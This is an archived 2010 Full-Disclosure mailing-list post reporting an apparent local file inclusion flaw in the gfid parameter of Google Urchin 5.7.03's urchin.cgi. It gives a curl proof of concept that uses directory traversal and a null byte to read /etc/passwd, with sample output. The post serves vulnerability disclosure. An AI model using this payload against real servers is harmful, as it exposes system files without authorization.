| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 14 Dec 2010 03:34:30 -0800 From: Kristian Erik Hermansen <kristian.hermansen@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: Google Urchin LFI (Local File Include) vulnerability While fuzzing an Urchin web application, I discovered what appears to be an LFI vulnerability. Neither Secunia nor Google / Urchin appear to have reported this as a known issue. The problem lies in the gfid parameter passed to urchin.cgi. This was tested on a somewhat modified version of Urchin 5.7.03, but it appears that the gfid param can be influenced given the results. I don't have the ability to test further, but this appears valid and unpublished. Can anyone confirm they see similar behavior in the same version or other versions? PoC: """ $ curl -s -b '...cookie_data...' 'https://host/path/urchin.cgi?profile=...&rid=13&cmd=svg&gfid=/../../../../../../../../../../../etc/passwd%00.html&ie5=.svg' root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh ... """ -- Kristian Erik Hermansen http://www.linkedin.com/in/kristianhermansen _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists